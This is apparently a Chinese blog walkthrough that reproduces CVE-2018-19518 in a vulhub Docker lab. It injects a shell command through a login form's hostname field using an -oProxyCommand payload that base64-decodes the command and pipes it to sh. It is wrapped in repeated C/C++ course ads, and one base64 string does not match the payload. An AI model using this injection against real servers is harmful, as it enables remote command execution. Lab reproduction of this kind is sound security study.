既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上C C++开发知识点,真正体系化!
由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新
漏洞复现
首先进入环境,最好在root权限下进行
cd vulhub/php/CVE-2018-19518
然后我们进入到该目录下使用docker启动
docker-compose build
docker-compose up -d
然后我们访问该ip的8080端口,出现一个登陆界面,这里我们随意输入,准备采取抓包
使用burp进行抓包,并发送到Repeater里
然后我们修改数据包,添加一段执行代码
例如 echo ‘Hello’>/tmp/test,对它进行base64编码
ZWNobyAYSGVsbG8ZPi90bXAvdGVzdA==
这里-oProxyCommand 表示使用该参数。
%09后添加上面进行base64编码后的内容,再将部分内容进行url编码。
hostname=x+-oProxyCommand%3decho%09ZWNobyAnSGVsbG8nPi90bXAvdGVzdA%3d%3d|base64%09-d|sh}&username=111&password=222
点击send发送数据包以后,我们准备进入虚拟机查看是否创建成功
进入容器
这里我们进入容器查看刚才文件是否创建成功,先查询id
docker ps -a
查看容器id后在下面命令中输入id进入
docker exec -it ID /bin/bash
进入到tmp目录下查看文件
cd /tmp
ls -al
cat test
![img](https://img-blog.csdnimg.cn/img_convert/39fac37de59de674a53ab137bca2db22.png)
![img](https://img-blog.csdnimg.cn/img_convert/29db9191fe75e630d0a3d5634c792e80.png)
**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上C C++开发知识点,真正体系化!**
**由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新**
**[如果你需要这些资料,可以戳这里获取](https://bbs.csdn.net/topics/618668825)**
码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新**
**[如果你需要这些资料,可以戳这里获取](https://bbs.csdn.net/topics/618668825)**